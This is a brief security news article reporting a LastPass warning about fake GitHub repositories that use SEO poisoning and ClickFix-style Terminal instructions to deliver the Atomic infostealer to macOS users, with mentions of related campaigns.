LastPass has issued a warning about a widespread information-stealing campaign targeting macOS users through fake GitHub repositories. These repositories host malware-infused programs disguised as legitimate tools.
According to Alex Cox, Mike Kosak, and Stephanie Schneider from the LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team, the fraudulent repositories specifically redirect victims to download the Atomic infostealer malware.
The campaign doesn’t only impersonate LastPass. Other well-known tools being spoofed include 1Password, Basecamp, Dropbox, Gemini, Hootsuite, Notion, Obsidian, Robinhood, Salesloft, SentinelOne, Shopify, Thunderbird, and TweetDeck. All of these fake GitHub repositories are tailored to target macOS systems.
Attackers are using SEO poisoning to push malicious GitHub links to the top of search results on Google and Bing. Unsuspecting users searching for these tools are prompted to click an “Install on MacBook” button, which redirects them to the malicious GitHub domain.
To evade takedowns, the attackers appear to create GitHub pages under multiple usernames, LastPass noted. Once on the page, victims are guided to another domain hosting ClickFix-style instructions, which trick users into copying and running commands in the macOS Terminal. This leads to the installation of the Atomic Stealer malware.
Similar techniques have been seen before. For example, malicious Google Ads promoting Homebrew previously directed users to a fake GitHub repository delivering a multi-stage dropper. This malware could detect virtual machines or analysis tools, decode and run system commands, and establish connections with remote servers, according to security researcher Dhiraj Mishra.
In recent weeks, attackers have also been observed exploiting public GitHub repositories to distribute malware via Amadey, and even using dangling commits from legitimate repositories to mislead users into downloading malicious programs.
Author: shadjavist
Humble gentleman who never believes in impossibility
